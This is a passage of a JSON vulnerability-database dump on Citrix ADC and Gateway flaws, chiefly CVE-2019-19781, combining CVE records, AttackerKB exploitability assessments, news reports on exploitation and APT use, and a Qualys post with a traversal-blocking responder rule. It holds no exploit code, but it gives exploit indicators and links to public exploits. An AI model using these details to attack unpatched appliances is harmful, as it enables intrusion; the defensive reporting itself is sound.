"AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2020-07-19T17:19:09", "bulletinFamily": "NVD", "description": "Improper access control in Citrix ADC Gateway Linux client versions before 1.0.0.137 results in local privilege escalation to root.", "modified": "2020-07-17T15:10:00", "id": "CVE-2020-8199", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8199", "published": "2020-07-10T16:15:00", "title": "CVE-2020-8199", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-15T10:35:32", "bulletinFamily": "NVD", "description": "Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in Stored Cross-Site Scripting (XSS).", "modified": "2020-07-13T20:41:00", "id": "CVE-2020-8198", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8198", "published": "2020-07-10T16:15:00", "title": "CVE-2020-8198", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-07-15T10:35:31", "bulletinFamily": "NVD", "description": "Improper input validation in Citrix ADC and Citrix Gateway versions before 11.1-63.9 and 12.0-62.10 allows unauthenticated users to perform a denial of service attack.", "modified": "2020-07-13T20:57:00", "id": "CVE-2020-8187", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8187", "published": "2020-07-10T16:15:00", "title": "CVE-2020-8187", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-07-15T10:35:32", "bulletinFamily": "NVD", "description": "Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.", "modified": "2020-07-13T20:51:00", "id": "CVE-2020-8194", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8194", "published": "2020-07-10T16:15:00", "title": "CVE-2020-8194", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "attackerkb": [{"lastseen": "2020-07-30T09:27:43", "bulletinFamily": "info", "description": "An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\n\n**Recent assessments:**\n\n**kevthehermit** at 2020-02-22T00:29:26.765449Z reported:\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix. \r\n\r\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version. \r\n\r\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\nAssessed Attacker Value: 5\nAssessed Exploitability: 5\n**bcook-r7** at 2020-01-11T19:23:51.380617Z reported:\nThere are now public exploits for this and it is now reliable and low-risk to exploit. More info at https://www.reddit.com/r/blueteamsec/comments/en4m7j/multiple_exploits_for_cve201919781_citrix which is a pretty reasonable approximation for how this AKB entry would ideally look :) Also of note, https://twitter.com/buffaloverflow/status/1216807963974938624 mentions a number of files of interest to an attacker.\n\nAssessed Attacker Value: 5\nAssessed Exploitability: 5\n**zeroSteiner** at 2020-01-02T15:42:04.704918Z reported:\nThis vulnerability [appears](https://support.citrix.com/article/CTX267679) to be based on a web request to a `/vpns/` resource containing a directory traversal reference. The traversal reference seems to grant access to the admin portal. This specifically is blocked by the `skip_systemaccess_policyeval` flag in the [interim fix](https://support.citrix.com/article/CTX267679) published by Citrix. Based on what information is available publicly, the vulnerability can be exploited to gain code execution on the Citrix server without authentication information. This would be very useful to an attacker because it could be exploited remotely, without authentication and due to the nature of Citrix servers often having a lot of traffic which could facilitate an attacker's efforts to obfuscate their activity.\r\n\r\nIn some environments, Cirtix servers may not be patched as frequently as other systems due to their mission critical nature of providing applications for external users. In this case, attackers may have an easier time in escalating their privileges once code execution has been obtained. This would only be necessary if the initial vector did not already yield `NT_AUTHORITY\\SYSTEM` privileges which the current information does not specify.\n\nAssessed Attacker Value: 4\nAssessed Exploitability: 5\n", "modified": "2020-07-30T05:01:27", "published": "2019-12-27T14:30:04", "id": "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "href": "https://attackerkb.com/topics/afc76977-d355-470d-a7f6-fef7a8352b65", "title": "CVE-2019-19781", "type": "attackerkb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2019-12-19T16:22:11", "bulletinFamily": "software", "description": "### Description\n\nMultiple Citrix Products are prone to a remote code-execution vulnerability. Successfully exploiting this issue will allow attackers to execute arbitrary code within the context of the application.\n\n### Technologies Affected\n\n * Citrix NetScaler Gateway 10.5 \n * Citrix NetScaler Gateway 11.1 \n * Citrix NetScaler Gateway 12.0 \n * Citrix NetScaler Gateway 12.1 \n * Citrix NetScaler Gateway 13.0 \n * Citrix Netscaler Application Delivery Controller 10.5 \n * Citrix Netscaler Application Delivery Controller 11.1 \n * Citrix Netscaler Application Delivery Controller 12.0 \n * Citrix Netscaler Application Delivery Controller 12.1 \n * Citrix Netscaler Application Delivery Controller 13.0 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as non-executable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-12-17T00:00:00", "published": "2019-12-17T00:00:00", "id": "SMNTC-111238", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111238", "title": "Multiple Citrix Products CVE-2019-19781 Remote Code Execution Vulnerability", "type": "symantec", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2020-07-08T08:26:37", "bulletinFamily": "info", "description": "[](<https://thehackernews.com/images/-YFgpJhs_wIc/XwV5FgvOBvI/AAAAAAAAAi0/I-4cCa2dIG4SoMiPExrAAoVmPOMt6TE-ACLcBGAsYHQ/s728-e100/citrix-software.jpg>)\n\nCitrix yesterday issued new security patches for as many as [11 security flaws](<https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/>) that affect its Citrix Application Delivery Controller (ADC), Gateway, and SD-WAN WAN Optimization edition (WANOP) networking products. \n \nSuccessful exploitation of these critical flaws could let unauthenticated attackers perform code injection, information disclosure, and even denial-of-service attacks against the gateway or the [authentication virtual servers](<https://docs.citrix.com/en-us/netscaler/12/aaa-tm/authentication-virtual-server.html>). \n \nCitrix confirmed that the aforementioned issues do not impact other virtual servers, such as load balancing and content switching virtual servers. \n \nAmong the affected Citrix SD-WAN WANOP appliances include models 4000-WO, 4100-WO, 5000-WO, and 5100-WO. \n\n\n \nThe networking vendor also reiterated that these vulnerabilities were not connected to a previously fixed [zero-day NetScaler flaw](<https://thehackernews.com/2020/01/citrix-adc-patch-update.html>) (tagged as [CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)) that allowed bad actors to perform [arbitrary code execution](<https://support.citrix.com/article/CTX267027>) even without proper authentication. \n \nIt also said there's no evidence the newly disclosed flaws are exploited in the wild and that barriers to exploitation of these flaws are high. \n \n\"Of the 11 vulnerabilities, there are six possible attacks routes; five of those have barriers to exploitation,\" Citrix's CISO Fermin Serna said. \"Two of the remaining three possible attacks additionally require some form of existing access. That effectively means an external malicious actor would first need to gain unauthorized access to a vulnerable device to be able to conduct an attack.\" \n \nAlthough Citrix has refrained from publishing technical details of the vulnerabilities citing malicious actors' efforts to leverage the patches and the information to reverse engineer exploits, attacks on the management interface of the products could result in system compromise by an unauthenticated user, or through Cross-Site Scripting (XSS) on the management interface. \n \nAn adversary could also create a download link for a vulnerable device, which could result in the compromise of a local computer upon execution by an unauthenticated user on the management network. \n\n\n \nA second class of attacks concerns virtual IPs (VIPs), permitting an attacker to mount DoS against the Gateway or remotely scan the ports of the internal network. \n \n\"Attackers can only discern whether a TLS connection is possible with the port and cannot communicate further with the end devices,\" Citrix noted in its [advisory](<https://support.citrix.com/article/CTX276688>). \n \nIn addition, a separate vulnerability in Citrix Gateway Plug-in for Linux (CVE-2020-8199) would grant a local logged-on user of a Linux system to elevate their privileges to an administrator account on that system. \n \nAccording to a [Positive Technologies](<https://www.ptsecurity.com/ww-en/about/news/citrix-vulnerability-allows-criminals-to-hack-networks-of-80000-companies/>) report last December, the traffic management and secure remote access applications are used by over 80,000 organizations across the world. \n \nIt's recommended that download and apply the latest builds for Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP appliances as soon as possible to mitigate risk and defend against potential attacks designed to exploit these flaws.\n", "modified": "2020-07-08T07:43:59", "published": "2020-07-08T07:43:00", "id": "THN:DABC62CDC9B66962217D9A8ABA9DF060", "href": "https://thehackernews.com/2020/07/citrix-software-security-update.html", "type": "thn", "title": "Citrix Issues Critical Patches for 11 New Flaws Affecting Multiple Products", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-24T07:27:25", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-C3dSDFvJiqA/XiW3-49gerI/AAAAAAAABUA/ZZoejAM3OJUPzdMEoE_ef-Wyi7-BtaokACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway-hacking.jpg>)\n\nCitrix has finally started rolling out security patches for a critical [vulnerability in ADC and Gateway](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>) software that attackers started exploiting in the wild earlier this month after the company announced the existence of the issue without releasing any permanent fix. \n \nI wish I could say, \"better late than never,\" but since hackers don't waste time or miss any opportunity to exploit vulnerable systems, even a short window of time resulted in the compromise of hundreds of Internet exposed Citrix ADC and Gateway systems. \n \nAs explained earlier on The Hacker News, the vulnerability, tracked as **CVE-2019-19781**, is a path traversal issue that could allow unauthenticated remote attackers to execute arbitrary code on several versions of Citrix ADC and Gateway products, as well as on the two older versions of Citrix SD-WAN WANOP. \n \nRated critical with CVSS v3.1 base score 9.8, the issue was discovered by Mikhail Klyuchnikov, a security researcher at Positive Technologies, who responsibly reported it to Citrix in early December. \n\n\n \nThe vulnerability is actively being exploited in the wild since last week by dozens of hacking groups and individual attackers\u2014thanks to the public release of multiple [proofs-of-concept exploit code](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>). \n \nAccording to cyber security [experts](<https://twitter.com/0xDUDE/status/1218988914272362496?s=08>), as of today, there are over 15,000 publicly accessible vulnerable Citrix ADC and Gateway servers that attackers can exploit overnight to target potential enterprise networks. \n \nFireEye experts found an attack campaign where someone was compromising vulnerable Citrix ADCs to install a previously-unseen payload, dubbed \"[NotRobin](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>),\" that scans systems for cryptominers and malware deployed by other potential attackers and removes them to maintain exclusive backdoor access. \n \n\n\n> [#Citrix](<https://twitter.com/hashtag/Citrix?src=hash&ref_src=twsrc%5Etfw>) released a free tool that analyzes available log sources and system forensic artifacts to identify whether an ADC appliance has potentially been compromised using CVE-2019-19781 security flaw. \n \nYou can find the tool and instructions here: <https://t.co/eewijzI2l9>[#infosec](<https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw>) <https://t.co/YKMwgPzmYE>\n> \n> \u2014 The Hacker News (@TheHackersNews) [January 22, 2020](<https://twitter.com/TheHackersNews/status/1219994163581554689?ref_src=twsrc%5Etfw>)\n\n \n \n\"This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device,\" FireEye said. \n \n\"FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators.\" \n \n\n\n## Citrix Patch Timeline: Stay Tuned for More Software Updates!\n\n \nLast week Citrix [announced a timeline](<https://twitter.com/TheHackersNews/status/1216239812249702401>), promising to release patched firmware updates for all supported versions of ADC and Gateway software before the end of January 2020, as shown in the chart. \n\n\n[](<https://1.bp.blogspot.com/-GFKY1pukwgU/XiWsvTjWRzI/AAAAAAAABT0/6B9St94Mff0LZyZw6yzG2oMefLn6gMgGACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway.jpg>)\n\nAs part of its [first batch of updates](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>), Citrix today released permanent patches for ADC versions 11.1 and 12.0 that also apply to \"ADC and Gateway VPX hosted on ESX, Hyper-V, KVM, XenServer, Azure, AWS, GCP or on a Citrix ADC Service Delivery Appliance (SDX).\" \n \n\"It is necessary to upgrade all Citrix ADC and Citrix Gateway 11.1 instances (MPX or VPX) to build 11.1.63.15 to install the security vulnerability fixes. It is necessary to upgrade all Citrix ADC and Citrix Gateway 12.0 instances (MPX or VPX) to build 12.0.63.13 to install the security vulnerability fixes,\" Citrix said in its advisory. \n\n\n \n\"We urge customers to install these fixes immediately,\" the company said. \"If you have not already done so, you need to apply the previously supplied mitigation to ADC versions 12.1, 13, 10.5, and SD-WAN WANOP versions 10.2.6 and 11.0.3 until the fixes for those versions are available.\" \n \nThe company also warned that customers with multiple ADC versions in production must apply the correct version of patch to each system separately. \n \nBesides installing available patches for supported versions and applying the recommended mitigation for unpatched systems, Citrix ADC administrators are also advised to monitor their device logs for attacks. \n \n**UPDATE \u2014 **Citrix on Thursday also released [second batch of permanent security patches](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>) for critical RCE vulnerability affecting ADC and Gateway versions 12.1 and 13.0.\n", "modified": "2020-01-24T07:05:37", "published": "2020-01-20T14:24:00", "id": "THN:166AAAF7F04EF01C9E049500387BD1FD", "href": "https://thehackernews.com/2020/01/citrix-adc-patch-update.html", "type": "thn", "title": "Citrix Releases Patches for Critical ADC Vulnerability Under Active Attack", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-11T13:18:47", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-_9-nocA92TI/XhmeU1ZwSqI/AAAAAAAA2KQ/m0YexAlFrVQzvw1H2fYT8uoiFY33g82DQCLcBGAsYHQ/s728-e100/citrix-adc-gateway-vulnerability.jpg>)\n\nIt's now or never to prevent your enterprise servers running vulnerable versions of Citrix application delivery, load balancing, and Gateway solutions from getting hacked by remote attackers. \n \nWhy the urgency? Earlier today, multiple groups publicly released weaponized proof-of-concept exploit code [[1](<https://github.com/trustedsec/cve-2019-19781>), [2](<https://github.com/projectzeroindia/CVE-2019-19781>)] for a recently disclosed remote code execution vulnerability in Citrix's NetScaler ADC and Gateway products that could allow anyone to leverage them to take full control over potential enterprise targets. \n \nJust before the last Christmas and year-end holidays, Citrix [announced](<https://support.citrix.com/article/CTX267027>) that its Citrix Application Delivery Controller (ADC) and Citrix Gateway are vulnerable to a critical path traversal flaw (CVE-2019-19781) that could allow an unauthenticated attacker to perform arbitrary code execution on vulnerable servers. \n\n\n \nCitrix confirmed that the flaw affects all supported version of the software, including: \n \n\n\n * Citrix ADC and Citrix Gateway version 13.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.1 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 11.1 all supported builds\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds\n \nThe company made the disclose without releasing any security patches for vulnerable software; instead, [Citrix offered mitigation](<https://support.citrix.com/article/CTX267679>) to help administrators guard their servers against potential remote attacks\u2060\u2014and even at the time of writing, there's no patch available almost 23 days after disclosure. \n \n\n\n \nThrough the cyberattacks against vulnerable servers were [first seen in the wild](<https://twitter.com/sans_isc/status/1213228049011007489>) last week when hackers developed private exploit after reverse engineering mitigation information, the public release of weaponized PoC would now make it easier for low-skilled script kiddies to launch cyberattacks against vulnerable organizations. \n\n\n \nAccording to [Shodan](<https://beta.shodan.io/search/facet?query=http.waf%3A%22Citrix+NetScaler%22&facet=org>), at the time of writing, there are over 125,400 Citrix ADC or Gateway servers publicly accessible and can be exploited overnight if not taken offline or protected using available mitigation. \n \nWhile discussing [technical details](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>) of the flaw in a blog post published yesterday, MDSsec also released a video demonstration of the exploit they developed but chose not to release it at this moment. \n \nBesides applying the recommended mitigation, Citrix ADC administrators are also advised to monitor their device logs for attacks.\n", "modified": "2020-01-11T10:22:37", "published": "2020-01-11T10:21:00", "id": "THN:6ED39786EE29904C7E93F7A0E35A39CB", "href": "https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html", "type": "thn", "title": "PoC Exploits Released for Citrix ADC and Gateway RCE Vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-18T15:48:20", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n\n\n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://1.bp.blogspot.com/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-control command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n\n\n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[](<https://1.bp.blogspot.com/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "modified": "2020-02-18T15:13:08", "published": "2020-02-18T15:06:00", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2020-01-20T12:15:15", "bulletinFamily": "blog", "description": "**Update January 17, 2020**: A new detection in Qualys Web Application Scanning was added. See \"Detecting with Qualys WAS\" below.\n\nCitrix released a [security advisory](<https://support.citrix.com/article/CTX267027>) ([CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)) for a remote code execution vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway products. The vulnerability allows an unauthenticated remote attacker to execute arbitrary code on the system. Once exploited, remote attackers could obtain access to private network resources without requiring authentication.\n\nDuring the week of January 13, [attacks on Citrix appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) have [intensified](<https://www.zdnet.com/article/a-hacker-is-patching-citrix-servers-to-maintain-exclusive-access/>). Because of the active attacks and the ease of exploitation, organizations are advised to pay close attention.\n\n### About CVE-2019-19781\n\nThe vulnerability affects all supported versions of Citrix ADC and Citrix Gateway products. As Citrix did not disclose many details about the vulnerability, the [mitigation steps](<https://support.citrix.com/article/CTX267679>) suggest the VPN handler fails to sufficiently sanitize user-supplied inputs. The exploit attempt would include HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL. The responder policy rule checks for string \u201c/vpns/\" and if user is connected to the SSLVPN, and sends a 403 response as seen below.\n\n_add responder policy ctx267027 \"HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/vpns/\\\") &amp;&amp; (!CLIENT.SSLVPN.IS_SSLVPN || HTTP.REQ.URL.DECODE_USING_TEXT_MODE.CONTAINS(\\\"/../\\\"))\" respondwith403 _\n\n### Detecting with Qualys VM\n\nQualys has issued QID 372305 for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that includes authenticated and remote detections of vulnerabilities present in affected Citrix products. This QID is included in signature version VULNSIGS-2.4.788-2.\n\n_QID 372305 : Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)_\n\nThe QID contains a remote and an authenticated signature to check the presence of vulnerability in Citrix Products. \nYou can search for this new QID in AssetView or within the VM Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid:372305_ \n_vulnerabilities.vulnerability.cveId:`CVE-2019-19781`_\n\nThis will return a list of all impacted hosts.\n\nYou can also create a Dashboard to track all Citrix vulnerabilities as shown in the template below:\n\n\n\n \n\n### Detecting with Qualys Threat Protection\n\nThe fastest way to locate vulnerable hosts is though the [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) Live Feed as seen here:\n\n\n\nSimply click on the Impacted Assets number to see a list of hosts with this vulnerability.\n\n### Detecting with Qualys WAS\n\nQualys has released QID 150273 in [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) (WAS) that includes a passive detection of vulnerabilities present in the affected Citrix products.\n\n_QID 150273 : Citrix ADC And Citrix Gateway Arbitrary Code Execution Vulnerability (CTX267027)_\n\nThis detection is useful for customers using Qualys WAS in their environments, and it has the advantage of detecting both at the root level of the target being scanned **and** at the starting URL of the web application as specified in the WAS configuration.\n\nThe passive detection works by sending an HTTPS request and looking for evidence of the vulnerability in the response. If the scanned application is vulnerable, the QID will be reported in your Qualys WAS scan report.\n\n### Mitigation\n\nCustomers are recommended to apply Citrix\u2019s [Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>) as soon as possible.\n\nCustomers can check their systems for exploit attempts using \u201cgrep\u201d for requests that contain \u201cvpns\u201d and \u201c..\u201d.\n\nA patch is expected from Citrix by the end of January 2020, and organizations are advised to install that patch as soon as it is available.", "modified": "2020-01-09T00:12:26", "published": "2020-01-09T00:12:26", "id": "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/01/08/citrix-adc-and-gateway-remote-code-execution-vulnerability-cve-2019-19781", "type": "qualysblog", "title": "Citrix ADC and Gateway Remote Code Execution Vulnerability (CVE-2019-19781)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-06-08T21:49:59", "bulletinFamily": "info", "description": "Digital workspace and enterprise networks vendor Citrix has announced a critical vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway. If exploited, it could allow unauthenticated attackers to gain remote access to a company\u2019s local network and carry out arbitrary code execution.\n\nThe Citrix products (formerly the NetScaler ADC and Gateway) are used for application-aware traffic management and secure remote access, respectively, and are installed in at least 80,000 companies in 158 countries, according to Mikhail Klyuchnikov, a researcher at Positive Technologies. The U.S accounts for about 38 percent of vulnerable organizations.\n\n\u201cThis attack does not require access to any accounts, and therefore can be performed by any external attacker,\u201d he noted in research released on Tuesday. \u201cThis vulnerability allows any unauthorized attacker to not only access published applications, but also attack other resources of the company\u2019s internal network from the Citrix server.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile neither Citrix nor Positive Technologies released technical details on the bug ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)), they said it affects all supported versions of the product, and all supported platforms, including Citrix ADC and Citrix Gateway 13.0, Citrix ADC and NetScaler Gateway 12.1, Citrix ADC and NetScaler Gateway 12.0, Citrix ADC and NetScaler Gateway 11.1, and also Citrix NetScaler ADC and NetScaler Gateway 10.5, according to the research.\n\n\u201cCitrix applications are widely used in corporate networks,\u201d said Dmitry Serebryannikov, director of security audit department at Positive Technologies, in a statement. \u201cThis includes their use for providing terminal access of employees to internal company applications from any device via the internet. Considering the high risk brought by the discovered vulnerability, and how widespread Citrix software is in the business community, we recommend information security professionals take immediate steps to mitigate the threat.\u201d\n\nCitrix released a [set of measures](<https://support.citrix.com/article/CTX267679>) to mitigate the vulnerability, including software updates, according to the researchers.\n\nThe vendor [made security news](<https://threatpost.com/citrix-confirms-password-spraying-heist/146641/>) earlier this year when cyberattackers used password-spraying techniques to make off with 6TB of internal documents and other data. The attackers intermittently accessed Citrix\u2019 infrastructure between October 13, 2018 and March 8, the company said, and the crooks \u201cprincipally stole business documents and files from a company shared network drive that has been used to store current and historical business documents, as well as a drive associated with a web-based tool used in our consulting practice.\u201d\n\nPassword-spraying is a related type of attack to brute-forcing and credential-stuffing. Instead of trying a large number of passwords against a single account, in password-spraying the adversary will try a single commonly used password (such as \u201c123456\u201d) against many accounts. If unsuccessful, a second password will be tried, and so on until accounts are cracked. This \u201clow and slow\u201d method is used to avoid account lock-outs stemming from too many failed login attempts.\n\nIn the case of Citrix, which has always specialized in federated architectures, the FBI surmised in March that the attackers likely gained a foothold with limited access, and then worked to circumvent additional layers of security. That was backed up by evidence that the attackers were trying to pivot to other areas of the infrastructure.\n", "modified": "2019-12-26T19:17:55", "published": "2019-12-26T19:17:55", "id": "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "href": "https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/", "type": "threatpost", "title": "Critical Citrix Bug Puts 80,000 Corporate LANs at Risk", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 